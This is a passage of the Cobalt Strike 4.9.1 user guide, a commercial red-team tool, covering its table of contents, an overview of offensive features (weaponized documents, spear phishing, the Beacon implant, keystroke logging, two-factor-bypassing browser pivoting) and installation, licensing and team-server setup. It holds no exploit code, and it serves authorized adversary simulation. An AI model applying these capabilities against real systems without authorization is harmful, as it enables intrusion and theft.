484 KiB
cobalt cobalt-strike userguide
Cobalt Strike User Guide
CopyrightTermsandConditions Copyright©Fortra,LLCanditsgroupofcompanies.Alltrademarksandregisteredtrademarksarethepropertyoftheirrespective owners. ThecontentinthisdocumentisprotectedbytheCopyrightLawsoftheUnitedStatesofAmericaandothercountriesworldwide.The unauthorizeduseand/orduplicationofthismaterialwithoutexpressandwrittenpermissionfromFortraisstrictlyprohibited.Excerpts andlinksmaybeused,providedthatfullandclearcreditisgiventoFortrawithappropriateandspecificdirectiontotheoriginalcontent. 202310100841-4.9.1
Table of Contents Welcome to Cobalt Strike 10 Overview 10 InstallationandUpdates 11 StartingtheTeamServer 20 StartingaCobaltStrikeClient 21 DistributedandTeamOperations 23 ScriptingCobaltStrike 24 RunningtheClientonMacOSX 26 User Interface 28 Overview 28 Toolbar 28 SessionandTargetVisualizations 29 Tabs 32 Consoles 32 Tables 33 KeyboardShortcuts 34 Data Management 36 Overview 36 Targets 36 Services 37 Credentials 37 CobaltStrikeUserGuide www.fortra.com page:iii
TableofContents Maintenance 38 Listener and Infrastructure Management 39 Overview 39 ListenerManagement 39 CobaltStrike’sBeaconPayload 41 PayloadStaging 43 DNSBeacon 44 HTTPBeaconandHTTPSBeacon 50 SMBBeacon 56 TCPBeacon 59 ExternalC2 62 ForeignListeners 64 InfrastructureConsolidation 65 Initial Access 67 Client-sideSystemProfiler 67 ApplicationBrowser 67 CobaltStrikeWebServices 68 User-drivenAttackPackages 68 HostingFiles 79 User-drivenWebDrive-byAttacks 79 Client-sideExploits 83 CloneaSite 84 SpearPhishing 85 CobaltStrikeUserGuide www.fortra.com page:iv
TableofContents Payload Artifacts and Anti-virus Evasion 89 TheArtifactKit 89 TheVeilEvasionFramework 91 JavaAppletAttacks 91 TheResourceKit 92 TheSleepMaskKit 92 Post Exploitation 93 BeaconCovertC2Payload 93 TheBeaconConsole 93 TheBeaconMenu 94 AsynchronousandInteractiveOperations 94 RunningCommands 95 SessionPassing 96 AlternateParentProcesses 97 SpoofProcessArguments 97 BlockingDLLsinChildProcesses 97 UploadandDownloadFiles 98 FileBrowser 98 TheWindowsRegistry 99 KeystrokesandScreenshots 100 ControllingBeaconJobs 100 TheProcessBrowser 101 DesktopControl 102 CobaltStrikeUserGuide www.fortra.com page:v
TableofContents PrivilegeEscalation 103 Mimikatz 107 CredentialandHashHarvesting 107 PortScanning 108 NetworkandHostEnumeration 108 TrustRelationships 109 LateralMovement 111 LateralMovementGUI 112 BeaconDataStore 113 OtherCommands 114 Browser Pivoting 115 Overview 115 Setup 116 Use 117 HowBrowserPivotingWorks 118 Pivoting 119 WhatisPivoting 119 SOCKSProxy 119 ReversePortForward 120 SpawnandTunnel 121 PivotListeners 122 CovertVPN 123 SSH Sessions 126 CobaltStrikeUserGuide www.fortra.com page:vi
TableofContents TheSSHClient 126 RunningCommands 126 UploadandDownloadFiles 127 Peer-to-peerC2 127 SOCKSPivotingandReversePortForwards 128 Malleable Command and Control 129 Overview 129 CheckingforErrors 129 ProfileLanguage 130 HTTPStaging 138 ABeaconHTTPTransactionWalk-through 139 HTTPHostProfiles 140 HTTPServerConfiguration 143 Self-signedSSLCertificateswithSSLBeacon 144 ValidSSLCertificateswithSSLBeacon 145 ProfileVariants 146 HTTPBeacons 146 CodeSigningCertificate 147 DNSBeacons 148 ExercisingCautionwithMalleableC2 150 Malleable PE, Process Injection, and Post Exploitation 151 Overview 151 PEandMemoryIndicators 151 CobaltStrikeUserGuide www.fortra.com page:vii
TableofContents ProcessInjection 155 ControllingProcessInjection 157 ControllingPostExploitation 160 Post-exUserDefinedReflectiveDLLLoader 163 UserDefinedReflectiveDLL Loader 164 Beacon Object Files 171 WhataretheadvantagesofBOFs? 171 HowdoBOFswork? 171 WhatarethedisadvantagesofBOFs? 171 HowdoIdevelopaBOF? 172 DynamicFunctionResolution 173 AggressorScriptandBOFs 174 BOFCAPI 175 FormattingBOFOutput 180 Aggressor Script 186 WhatisAggressorScript? 186 HowtoLoadScripts 186 TheScriptConsole 187 HeadlessCobaltStrike 188 AQuickSleepIntroduction 188 InteractingwiththeUser 190 CobaltStrike 191 DataModel 195 CobaltStrikeUserGuide www.fortra.com page:viii
TableofContents Listeners 196 Beacon 199 SSHSessions 208 OtherTopics 210 Callbacks 213 CustomReports 216 CompatibilityGuide 218 Hooks 220 Events 239 Functions 255 PopupHooks 445 Report-OnlyFunctions 446 Reporting and Logging 458 Logging 458 Reports 458 CustomLogoinReports 463 CustomReports 464 Appendix 466 KeyboardShortcuts 466 BeaconCommandBehaviorandOPSECConsiderations 467 UnicodeSupport 473 CobaltStrikeUserGuide www.fortra.com page:ix
WelcometoCobaltStrike/Overview Welcome to Cobalt Strike CobaltStrikeisaplatformforadversarysimulationsandredteamoperations.Theproductis designedtoexecutetargetedattacksandemulatethepost-exploitationactionsofadvanced threatactors.ThissectiondescribestheattackprocesssupportedbyCobaltStrike’sfeatureset. Therestofthismanualdiscussesthesefeaturesindetail. Overview figure1-TheOffenseProblemSet Athought-outtargetedattackbeginswithreconnaissance.CobaltStrike’ssystemprofilerisa webapplicationthatmapsyourtarget’sclient-sideattacksurface.Theinsightsgleanedfrom reconnaissancewillhelpyouunderstandwhichoptionshavethebestchanceofsuccesson yourtarget. Weaponizationispairingapost-exploitationpayloadwithadocumentorexploitthatwill executeitontarget.CobaltStrikehasoptionstoturncommondocumentsintoweaponized artifacts.CobaltStrikealsohasoptionstoexportitspost-exploitationpayload,Beacon,ina varietyofformatsforpairingwithartifactsoutsideofthistoolset. UseCobaltStrike’sspearphishingtooltodeliveryourweaponizeddocumenttooneormore peopleinyourtarget’snetwork.CobaltStrike’sphishingtoolrepurposessavedemailsintopixel- perfectphishes. CobaltStrikeUserGuide www.fortra.com page:10
WelcometoCobaltStrike/InstallationandUpdates Controlyourtarget’snetworkwithCobaltStrike’sBeacon.Thispost-exploitationpayloaduses anasynchronous“low and slow”communicationpatternthat’scommonwithadvancedthreat malware.BeaconwillphonehomeoverDNS,HTTP,orHTTPS.Beaconwalksthroughcommon proxyconfigurationsandcallshometomultiplehoststoresistblocking. Exerciseyourtarget’sattackattributionandanalysiscapabilitywithBeacon’sMalleable CommandandControllanguage.ReprogramBeacontouse network indicators that look like known malwareorblendinwithexistingtraffic. Pivotintothecompromisednetwork,discoverhosts,andmove laterallywithBeacon’shelpful automationandpeer-to-peercommunicationovernamedpipesandTCPsockets.CobaltStrike isoptimizedtocapturetrustrelationshipsandenablelateralmovementwithcaptured credentials,passwordhashes,accesstokens,andKerberostickets. DemonstratemeaningfulbusinessriskwithCobaltStrike’suser-exploitationtools.Cobalt Strike’sworkflowsmakeiteasytodeploykeystrokeloggersandscreenshotcapturetoolson compromisedsystems.Usebrowserpivotingtogainaccesstowebsitesthatyour compromisedtargetisloggedontowithInternetExplorer.ThisCobaltStrike-onlytechnique workswithmostsitesandbypassestwo-factorauthentication. CobaltStrike’sreportingfeaturesreconstruct the engagementforyourclient.Providethe networkadministratorsanactivitytimelinesotheymayfindattackindicatorsintheirsensors. CobaltStrikegenerateshighqualityreportsthatyoumaypresenttoyourclientsasstand-alone productsoruseasappendicestoyourwrittennarrative. Throughouteachoftheabovesteps,youwillneedtounderstandthetargetenvironment,its defenses,andreasonaboutthebestwaytomeetyourobjectiveswithwhatisavailabletoyou. Thisisevasion.ItisnotCobaltStrike’sgoaltoprovideevasionout-of-the-box.Instead,the productprovidesflexibility,bothinitspotentialconfigurationsandoptionstoexecuteoffense actions,toallowyoutoadapttheproducttoyourcircumstanceandobjectives. Installation and Updates FortraLLCdistributesCobaltStrikepackagesasnativearchivesforWindows,Linux,and MacOSX. CobaltStrikeusesaclient/servermodelwhereeachcomponentcanbeinstalledonthesame system,butisoftendeployedseparately.TheCobaltStrikeGUIisreferredtoas‘CobaltStrike’, the‘CobaltStrikeGUI’,orthecommandusedtostarttheclient‘cobaltstrike’.TheCobaltStrike serverisreferredtoas‘TeamServer’orthecommandusedtostarttheserver‘teamserver’. ThebasicprocesstoinstallCobaltStrikeinvolvesdownloadingandextractingadistribution packageontoyouroperatingsystemandrunninganupdateprocesstodownloadtheproduct. CobaltStrikeUserGuide www.fortra.com page:11
WelcometoCobaltStrike/InstallationandUpdates Before You Begin ReadthissectionbeforeyouinstallCobaltStrike. System Requirements ThefollowingitemsarerequiredforanysystemhostingtheCobaltStrikeclientand/orserver components. Java CobaltStrike'sGUIclientandteamserverrequireoneofthefollowingJavaenvironments: l OracleJava1.8 l OracleJava11 l OpenJDK11.(seeInstalling OpenJDK on page 13forinstructions) NOTE: IfyourorganizationdoesnothavealicensethatallowscommercialuseofOracle'sJava, weencourageyoutouseOpenJDK11. SupportedOperatingSystems CobaltStrikeTeamServerissupportedonaLinuxsystemthatmeetstheJavarequirements andhasbeentestedonthefollowingDebianbasedLinuxdistributions(otherversionsmaywork buthavenotbeentested): l Debian l Ubuntu l KaliLinux CobaltStrikeClientrunsonthefollowingsystems: l Windows7andabove l MacOSX10.13andabove l GUIbasedLinux,suchas:Debian,UbuntuandKaliLinux(otherversionsmayworkbut havenotbeentested) Hardware CobaltStrikeUserGuide www.fortra.com page:12
WelcometoCobaltStrike/InstallationandUpdates Inadditiontoanacceptedoperatingsystem,thebelowminimumrequirementsshouldbemet: l 2GHz+processor l 2GBRAM l 500MB+availablediskspace OnAmazon'sEC2,useatleastaHigh-CPUMedium(c1.medium,1.7GB)instance. Linuxglibc BeawarethatcertainLinuxdistributionsmaybemissingordon'thavethecorrectversionof glibc.Ifyourunintothatissue,reviewtheKnowledgeArticle,glibcMissingFromOlderLinux Distributions,ontheFortraPortal. Installing OpenJDK CobaltStrikeistestedwithOpenJDK11anditslaunchersarecompatiblewithaproperly installedOpenJDK11environment. Linux(Kali2018.4,Ubuntu18.04)
- UpdateAPT: sudo apt-get update
- InstallOpenJDK11withAPT: sudo apt-get install openjdk-11-jdk
- MakeOpenJDK11thedefault: sudo update-java-alternatives -s java-1.11.0-openjdk-amd64 Linux(Other)
- UninstallthecurrentOpenJDKpackage(s).
- DownloadOpenJDKforLinux/x64at:https://jdk.java.net/archive/.
- ExtracttheOpenJDKbinary: tar zxvf openjdk-11.0.1_linux-x64_bin.tar.gz
- MovetheOpenJDKfolderto/usr/local: mv jdk-11.0.1 /usr/local
- Addthefollowingto~/.bashrc: JAVA_HOME="/usr/local/jdk-11.0.1" CobaltStrikeUserGuide www.fortra.com page:13
WelcometoCobaltStrike/InstallationandUpdates PATH=$PATH:$JAVA_HOME/bin 6. Refreshyour~/.bashrc tomakethenewenvironmentvariablestakeeffect: source ~/.bashrc MacOSX
- DownloadOpenJDKformacOS/x64at:https://jdk.java.net/archive/.
- OpenaTerminalandnavigatetotheDownloads/ folder.
- Extractthearchive: tar zxvf openjdk-11.0.1_osx-x64_bin.tar.gz
- Movetheextractedarchiveto/Library/Java/JavaVirtualMachines/: sudo mv jdk-11.0.1.jdk/ /Library/Java/JavaVirtualMachines/ ThejavacommandonMacOSXwillusethehighestJavaversionin/Library/Javaasthe default. TIP: IfyouareseeingaJRELoadError messagethisisbecausetheJavaAppLauncherstub includedwithCobaltStrikeloadsalibraryfromasetpathtoruntheJVMwithinthestub process.Issuethefollowingcommandtofixthiserror: sudo ln -fs /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk /Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin Replacejdk-11.0.2.jdkwithyourJavapath.ThenextCobaltStrikereleasewilluseaJava ApplicationStubforMacOSXthatismoreflexible. Windows
- DownloadOpenJDKforWindows/x64at:https://jdk.java.net/archive/.
- Extractthearchivetoc:\program files\jdk-11.0.1.
- Addc:\program files\jdk-11.0.\bin toyouruser'sPATHenvironmentvariable: a. GotoControl Panel-> System-> Change Settings-> Advanced-> Environment Variables.... b. HighlightPathinUser variables for user. c. PressEdit. d. PressNew. e. Type:c:\program files\jdk-11.0.1\bin. f. PressOKonalldialogs. Wayland Desktop - Not Supported CobaltStrikeUserGuide www.fortra.com page:14
WelcometoCobaltStrike/InstallationandUpdates WaylandisamodernreplacementfortheXWindowsSystem.Waylandhasmadegreatstrides, asaproject,andsomedesktopenvironmentsuseitastheirdefaultwindowsystem.Don'tlet theadoptionfoolyouthough.Notallapplicationsorapplicationenvironmentswork100% perfectlyonWayland.Therearestillbugsandissuestoaddress. TherearebugsinJava(orWayland)thatmaycauseagraphicalJavaapplicationtocrash, duringnormaluse,whenruninaWaylanddesktop.ThesebugsaffectCobaltStrikeusers. Fortra does not support the use of Cobalt Strike on Wayland desktops. Am IusingWayland? Typeecho $XDG_SESSION_TYPEtofindoutifyou'reonwaylandorx11. HowtodisableWaylandonKaliLinux ThelatestversionofKaliLinux2017RollingusesaWaylanddesktopbydefault.Tochangethis backtoX11:
- Open/etc/gdm3/daemon.confwithyourfavoritetexteditor.
- Findthe[daemon]section.
- AddWaylandEnable=falseandrebootyoursystem. Installing Cobalt Strike FollowtheseinstructionstoinstallCobaltStrike. NOTE: TheCobaltStrikeDistribution Package(steps1and3)containstheOS-specificCobalt Strikelauncher(s),supportingfiles,andtheupdaterprogram.ItdoesnotcontaintheCobalt Strikeprogramitself.RunningtheUpdate Program(step4)downloadstheCobaltStrike productandperformsthefinalinstallationsteps.
- DownloadaCobaltStrikedistributionpackageforasupportedoperatingsystem.(an emailisprovidedwithalinktothedownload)
- SetuparecommendedJavaenvironment.(seeInstalling OpenJDK on page 13for instructions) CobaltStrikeUserGuide www.fortra.com page:15
WelcometoCobaltStrike/InstallationandUpdates 3. Extract,mountorunzipthedistributionpackage.Basedontheoperatingsystem perform oneofthefollowing. a. ForLinux: i. Extractthecobaltstrike-dist.tgz: tar zxvf cobaltstrike-dist.tgz b. ForMacOSX: i. Double-clickthecobaltstrike-dist.dmg filetomountit. ii. DragtheCobalt StrikefoldertotheApplicationsfolder. c. ForWindows: i. Disableanti-virusbeforeyouinstallCobaltStrike. ii. Useyourpreferredziptooltoextractthecobaltstike.zip filetoaninstall location. 4. Runtheupdateprogram tofinishtheinstall.Basedontheoperatingsystem perform oneofthefollowing. a. ForLinux: i. Enterthefollowingcommands: cd /path/to/cobaltstrike ./update b. ForMacOSX: i. NavigatetotheCobalt Strikefolder. ii. Double-clickUpdate Cobalt Strike.command. c. ForWindows: i. NavigatetotheCobalt Strikefolder. ii. Double-clickupdate.bat. Makesureyouupdatebothyourteamserverandclientsoftwarewithyourlicensekey.Cobalt Strikeisgenerallylicensedonaperuserbasis.Theteamserverdoesnotrequireaseparate license. License Authorization Files ThelicensedversionofCobaltStrikerequiresavalidauthorizationfiletostart.Anauthorization fileisanencryptedblobthatprovidesinformationaboutyourlicensetotheCobaltStrike product. CobaltStrikeUserGuide www.fortra.com page:16
WelcometoCobaltStrike/InstallationandUpdates Authorizationfilesarenowassociatedtoaspecificrelease.Authorizationfilesfor4.8andearlier willcontinuetobebackwardcompatible.Authorizationfilesfor4.9andlaterwillonlybevalidfor thespecificversion. How doI get an authorization file? Thebuilt-inupdateprogramrequestsanauthorizationfilefromCobaltStrike'supdateserver whenit'srun.Theupdateprogramdownloadsanewauthorizationfileforthecurrentreleased version,evenifyourCobaltStrikeversionisuptodate.Thisallowstheauthorizationfiletostay currentwiththelicensedatesinFortrarecords. InordertogetanauthorizationfileforapreviousversionusetheCobaltStrikeAuthFile Generatorsite.Thissitewillgenerateanauthorizationfilefortheversionandlicensekeyyou enteronthepage.Usethedownloadlinktoretrievetheauthorizationfileorusetheinstructions onthepagetoconvertthebase64encodedstringtoanauthorizationfile.Thencopythe authorizationfiletoyourCobaltStrikeinstallationdirectory. What happenswhen my licenseexpires? CobaltStrikewillrefusetostartwhenitsauthorizationfileexpires.Additionally,thelicensed CobaltStrikeproductchecksauthorizationfilesdaily.Iftheauthorizationfileexpireswhile CobaltStrikeisrunning,theteamserverkeepsrunningforanadditional14daysgraceperiod. Theteamserverwillshutdowniftheauthorizationfileisnotreplacedduringthatperiod. Details: l Teamserverchecksthelicenseatstartupandat10AMeveryday. l Theteamserverlicenseexpirationisloggedintheeventlogwhentheteam serverstarts. l Clientsconnectedtoateamserverwilldisplayalicensewarningribbonstarting45days priortolicenseexpiration. l Runningteamserverswillhavea14daygraceperiodbeforetheserverisshutdown duringthedailylicensecheck. l Ifyouneedtoextendthelicenseforarunningteamserver,youcaninstall/update CobaltStrikeinadifferentlocationandcopy/replacethe“cobaltstrike.auth”filefrom the newinstallintotherunninginstance.Iftheteamserverversionispriortothecurrent releasedversionthenusetheCobaltStrikeAuthFileGeneratorsiteinstead. When doesmy authorization fileexpire? YourauthorizationfileexpireswhenyourCobaltStrikelicenseexpires.IfyourenewyourCobalt Strikelicense,runthebuilt-inupdateprogramtorefreshtheauthorizationfileforthecurrent CobaltStrikeUserGuide www.fortra.com page:17
WelcometoCobaltStrike/InstallationandUpdates releasedversionwiththelatestinformation.ForpreviousversionsusetheCobaltStrikeAuth FileGeneratorsitetorefreshtheauthorizationfilewiththelatestinformation. GotoHelp->System Informationtofindoutwhenyourauthorizationfileexpires.Lookforthe "validto"valueundertheOthersection.Remember,theClientInformationandTeamServer Informationmayhavedifferentvalues(dependingonwhichlicensekeywasusedandwhenthe authorizationfilewaslastrefreshed). CobaltStrikewillalsowarnyouwhenitsauthorizationfileiswithin45daysofitsvalidtodate. How doI bring an authorization fileintoa closed environment? Theauthorizationfileiscobaltstrike.auth.Theupdateprogramalwaysco-locatesthisfilewith cobaltstrike.jar.TouseCobaltStrikeinaclosedenvironment:
- DownloadtheCobaltStrikepackageathttps://www.cobaltstrike.com/download
- UpdatetheCobaltStrikepackagefrom aninternetconnectedsystem
- Copythecontentsoftheupdatedcobaltstrike/folderintoyourenvironment.Themost importantfilesarecobaltstrike.jarandcobaltstrike.auth. DoesCobalt StrikephonehometoFortra? Beyondtheupdateprocess,CobaltStrikedoesnot"phonehome"toFortra.Theauthorization fileisgeneratedbytheupdateprocess. How doI usean older version ofCobalt Strikewith a refreshed authorization file? InordertogetanauthorizationfileforapreviousversionusetheCobaltStrikeAuthFile Generatorsite.Thissitewillgenerateanauthorizationfilefortheversionandlicensekeyyou enteronthepage.Usethedownloadlinktoretrievetheauthorizationfileorusetheinstructions onthepagetoconvertthebase64encodedstringtoanauthorizationfile.Thencopythe authorizationfiletoyourCobaltStrikeinstallationdirectory. WhatistheCustomerIDvalue? TheCustomerIDisa4-bytenumberassociatedwithaCobaltStrikelicensekey.CobaltStrike 3.9andlaterembedthisinformationintothepayloadstagersandstagesgeneratedbyCobalt Strike. How doI find theCustomer ID valuein a Cobalt Strikeartifact? CobaltStrikeUserGuide www.fortra.com page:18
WelcometoCobaltStrike/InstallationandUpdates TheCustomerIDvalueisthelast4-bytesofaCobaltStrikepayloadstagerinCobaltStrike3.9 andlater. ThisscreenshotistheHTTPstagerfromthetrial.ThetrialhasaCustomerIDvalueof0.The last4-bytesofthisstager(0x0,0x0,0x0,0x0)reflectthis. figure2-HTTPPayloadStager(CobaltStrikeTrial) TheCustomerIDvaluealsoexistsinthepayloadstage,butit'smorestepstorecover.Cobalt StrikedoesnotusetheCustomerIDvalueinitsnetworktrafficorotherpartsofthetool. How doI protect disparatered team infrastructurefrom cross-identification with thisID? Ifyouhaveauniqueauthorizationfileoneachteamserver,theneachteamserverandthe artifactsthatoriginatefromitwillhaveadifferentID. CobaltStrike'supdateservergeneratesanewauthorizationfileeachtimetheupdateprogram isrun.EachauthorizationfilehasauniqueID.CobaltStrikeonlypropagatestheteamserver's ID.ItdoesnotpropagatetheIDfromtheGUIorheadlessclient'sauthorizationfile. After You are Done Congratulations!CobaltStrikeisnowinstalled.Readthefollowingforadditionalinformationand yournextsteps. Next Steps Starting the Team Server on page 20 Starting a Cobalt Strike Client on page 21 CobaltStrikeUserGuide www.fortra.com page:19
WelcometoCobaltStrike/StartingtheTeamServer Starting the Team Server CobaltStrikeissplitintoclientandaservercomponents.Theserver,referredtoastheteam server,isthecontrollerfortheBeaconpayloadandthehostforCobaltStrike’ssocial engineeringfeatures.TheteamserveralsostoresdatacollectedbyCobaltStrikeandit manageslogging. TheCobaltStriketeamservermustrunonasupportedLinuxsystem.TostartaCobaltStrike teamserver,issuethefollowingcommandtoruntheteamserverscriptincludedwiththe CobaltStrikeLinuxpackage: figure3-StartingtheTeamServer ./teamserver <ip_address> [ <kill_ date>] Theteamserverscriptusesthefollowingtwomandatoryandtwooptionalparameters: IP Address-(mandatory)EntertheexternallyreachableIPaddressoftheteamserver.Cobalt Strikeusesthisvalueasadefaulthostforitsfeatures. Password-(mandatory)Enterapasswordthatyourteammemberswillusetoconnectthe CobaltStrikeclienttotheteamserver. Malleable C2 Profile-(optional)SpecifyavalidMalleableC2Profile.SeeMalleable Command and Control on page 129formoreinformationonthisfeature. Kill Date-(optional)EnteradatevalueinYYYY-MM-DDformat.Theteamserverwillembedthis killdateintoeachBeaconstageitgenerates.TheBeaconpayloadwillrefusetorunonor afterthisdateandwillalsoexitifitwakesuponorafterthisdate. Whentheteamserverstarts,itwillpublishtheSHA256hashoftheteamserver’sSSL certificate.Distributethishashtoyourteammembers.Whenyourteammembersconnect, theirCobaltStrikeclientwillaskiftheyrecognizethishashbeforeitauthenticatestotheteam server.Thisisanimportantprotectionagainstman-in-the-middleattacks. Team Server Properties File CobaltStrikeUserGuide www.fortra.com page:20
WelcometoCobaltStrike/StartingaCobaltStrikeClient TeamServer.propisanoptionalfilecontaininganumberofparametersthatcanbeusedto customizesettings.Thisfileisnotincludedinthedistributionasthedefaultsarethe recommendedsettings.Ifthereisaneedtomodifythesettings,downloadthedefault TeamServer.propfilefromhttps://github.com/Cobalt-Strike/teamserver-proprepositoryinto theCobaltStrikeinstallationdirectory.Makeanymodificationsandrestarttheteamserver. ForadditionalinformationonasettingseetheREADME.mdintherepositoryandcommentsin theTeamServer.propfile. Starting a Cobalt Strike Client FollowthestepsbelowtoconnecttheCobaltStrikeclienttotheteamserver. Steps
- TostarttheCobaltStrikeclient,usethelauncherincludedwithyourplatform’spackage. a. ForLinux: i. Enterthefollowingcommands: ./cobaltstrike b. ForMacOSX: i. NavigatetotheCobalt Strikefolder. ii. Double-clickcobaltstrike. c. ForWindows: i. NavigatetotheCobalt Strikefolder. ii. Double-clickcobaltstrike.exe. TheConnectDialogscreendisplays. CobaltStrikeUserGuide www.fortra.com page:21
WelcometoCobaltStrike/StartingaCobaltStrikeClient figure 4 - CobaltStrikeConnectDialog 2. CobaltStrikekeepstrackoftheteam serversyouconnecttoandremembersyour information.Selectoneoftheseteam serverprofilesfrom theleft-hand-sideofthe connectdialogtopopulatetheconnectdialogwithitsinformation.UsetheAlias Names andHost Namesbuttonstotogglehowthelistofhostsaredisplayed.Active connectionswillbedisplayedinbluetext.Youmaycontrolhowthehostlistisinitially displayed,activeconnectiontextcolor,andprunethelistthroughCobalt Strike -> Preferences ->Team Servers. Parameters: Alias- Enteranaliasforthehostorusethedefault.Thealiasnamecannotbeempty, startwithan'*',orusethesamealiasnameofanactiveconnection. Host- Specifyyourteam server’saddressintheHostfield.Thehostnamecannotbe empty. Port- DisplaysthedefaultPortfortheteam server(50050).Thisisrarelychange.The portcannotbeemptyandmustbeanumericnumber. User- TheUserfieldisyournicknameontheteam server.Changethistoyourcallsign, handle,ormade-uphackerfantasyname.Theusernamecannotbeempty. Password- Enterthesharedpasswordfortheteam server. 3. PressConnecttoconnecttotheCobaltStriketeam server. Ifthisisyourfirstconnectiontothisteam server,CobaltStrikewillaskifyourecognize theSHA256hashofthisteam server. figure 5 - Verifyingtheserver’sSSLcertificate 4. Ifyoudo,pressYes,andtheCobaltStrikeclientwillconnecttotheserverandopenthe clientuserinterface. CobaltStrikeUserGuide www.fortra.com page:22
WelcometoCobaltStrike/DistributedandTeamOperations NOTE: CobaltStrikewillalsorememberthisSHA256hashforfutureconnections.Youmay managethesehashesthroughCobalt Strike -> Preferences -> Fingerprints. Distributed and Team Operations UseCobaltStriketocoordinateadistributedredteameffort.StageCobaltStrikeononeormore remotehosts.Startyourteamserversandhaveyourteamconnect. figure6-DistributedOperationswithCobaltStrike Onceconnectedtoateamserver,yourteamwill: l Usethesamesessions l Sharehosts,captureddata,anddownloadedfiles l Communicatethroughasharedeventlog. TheCobaltStrikeclientmayconnecttomultipleteamservers.GotoCobalt Strike ->New Connection toinitiateanewconnection.Whenconnectedtomultipleservers,aswitchbarwill showupatthebottomofyourCobaltStrikewindow. figure7-ServerSwitchbar CobaltStrikeUserGuide www.fortra.com page:23
WelcometoCobaltStrike/ScriptingCobaltStrike ThisswitchbarallowsyoutoswitchbetweenactiveCobaltStrikeserverinstances.Eachserver hasitsownbutton.Right-clickabuttonandselectRenametomakethebutton’stextreflectthe roleoftheserverduringyourengagement.Theserverbuttonwilldisplaytheactivebuttonin boldtextandcolorbasedoncolorpreferencefoundinCobalt Strike -> Preferences -> TeamServerstobetterindicatewhichbuttonisactive.Thisbuttonnamewillalsoidentifythe serverintheCobaltStrikeActivityReport. Whenconnectedtomultipleservers,CobaltStrikeaggregateslistenersfromalloftheservers it’sconnectedto.Thisaggregationallowsyoutosendaphishingemailfromoneserverthat referencesamaliciouswebsitehostedonanotherserver.Attheendofyourengagement, CobaltStrike’sreportingfeaturewillqueryalloftheserversyou’reconnectedtoandmergethe datatotellonestory. Reconnecting the Client Whentheclientdisconnectionisuser-initiatedwiththeMenu,ToolbarorSwitchbarServer button,aredbannerdisplayswithaReconnectandClosebutton. PressClosetoclosethewindow.PressReconnecttoreconnecttotheTeamServer. IftheTeamServerisnotavailableadialogdisplaysaskingifyouwanttoretry(Yes/No).IfYes thenconnectionisattemptedagain(repeatsifneeded).IfNo,thedialogcloses. WhendisconnectionisinitiatedbytheTeamServerorothernetworkinterruptiontheredbanner willdisplayamessagewithacountdownforconnectionretry.Thiswillrepeatuntilaconnection ismadewiththeTeamServerortheuserclicksonClose.Inthiscasetheusercaninteractwith otherpartsoftheUI. Whentheclientreconnects,theredreconnectbardisappears. Scripting Cobalt Strike CobaltStrikeUserGuide www.fortra.com page:24
WelcometoCobaltStrike/ScriptingCobaltStrike CobaltStrikeisscriptablethroughitsAggressorScriptlanguage.AggressorScriptallowsyouto modifyandextendtheCobaltStrikeclient. History AggressorScriptisthespiritualsuccessortoCortana,theopensourcescriptingenginein Armitage.CortanawasmadepossiblebyacontractthroughDARPA'sCyberFastTrack program.CortanaallowsitsuserstoextendArmitageandcontroltheMetasploit® Framework anditsfeaturesthroughArmitage'steamserver.CobaltStrike3.0isaground-uprewriteof CobaltStrikewithoutArmitageasafoundation.Thischangeaffordedanopportunitytorevisit CobaltStrike'sscriptingandbuildsomethingaroundCobaltStrike'sfeatures.Theresultofthis workisAggressorScript. AggressorScriptisascriptinglanguageforredteamoperationsandadversarysimulations inspiredbyscriptableIRCclientsandbots.Itspurposeistwo-fold.Youmaycreatelongrunning botsthatsimulatevirtualredteammembers,hackingside-by-sidewithyou.Youmayalsouseit toextendandmodifytheCobaltStrikeclienttoyourneeds. Loading Scripts AggressorScriptisbuiltintotheCobaltStrikeclient.Tomanagescripts,gotoCobalt Strike -> Script ManagerandpressLoad. figure8-ScriptManager AdefaultscriptinsideofCobaltStrikedefinesallofCobaltStrike’spopupmenusandformats informationdisplayedinCobaltStrike’sconsoles.ThroughtheAggressorScriptengine,you mayoverridethesedefaultsandcustomizeCobaltStriketoyourpreferences. YoumayalsouseAggressorScripttoaddnewfeaturestoCobaltStrike’sBeaconandto automatecertaintasks. TolearnmoreaboutAggressorScript,seeAggressor Script on page 186. CobaltStrikeUserGuide www.fortra.com page:25
WelcometoCobaltStrike/RunningtheClientonMacOSX Running the Client on Mac OS X TheCobaltStrikeclientmaynotbeabletoshowcontentsoftheDocuments,Desktop,and Downloadsfoldersinthefilebrowserinitially.(e.g.loadingscripts,uploadingfiles,generating payloads,etc…) Bydefault,OSXlimitswhataccessapplicationshavetotheDocuments,Desktop,andDownload folders.Theseapplicationsneedtoexplicitlybegrantedaccesstothesefolders. SinceCobaltStrikeisathirdpartyapplication,itisn'tasstraightforwardasgrantingtheapp "CobaltStrike"access.YoumayneedtogivetheJRErunningCobaltStrikeclientaccesstothe filesystem.YoucangiveaccesstothespecificFilesandFoldersorFullDiskAccess. Youmaybepromptedfortheaccess: figure9-MacOSXAccessPrompt Or,iftheaccesshasbeenpreviouslydenied,youmayneedtoedittheaccessintheOSXSystem Preferences/Security&Privacy/Privacydialog: CobaltStrikeUserGuide www.fortra.com page:26
WelcometoCobaltStrike/RunningtheClientonMacOSX figure10-OSXPrivacyDialog PleasebeadvisedthatotherapplicationsthatusetheJREwillalsohavethisaccess. NOTE: Thesamestepsmayalsoneedtobetakenfor'/bin/bash'. CobaltStrikeUserGuide www.fortra.com page:27
UserInterface/Overview User Interface Overview TheCobaltStrikeuserinterfaceissplitintotwoparts.Thetopoftheinterfaceshowsa visualizationofsessionsortargets.ThebottomoftheinterfacedisplaystabsforeachCobalt Strikefeatureorsessionyouinteractwith.Youmayclicktheareabetweenthesetwopartsand resizethemtoyourliking. figure11-CobaltStrikeUserInterface Toolbar ThetoolbaratthetopofCobaltStrikeoffersquickaccesstocommonCobaltStrikefunctions. KnowingthetoolbarbuttonswillspeedupyouruseofCobaltStrikeconsiderably. Connecttoanotherteamserver Disconnectfromthecurrentteamserver CreateandeditCobaltStrike’slisteners ShowSessionsinGraphView CobaltStrikeUserGuide www.fortra.com page:28
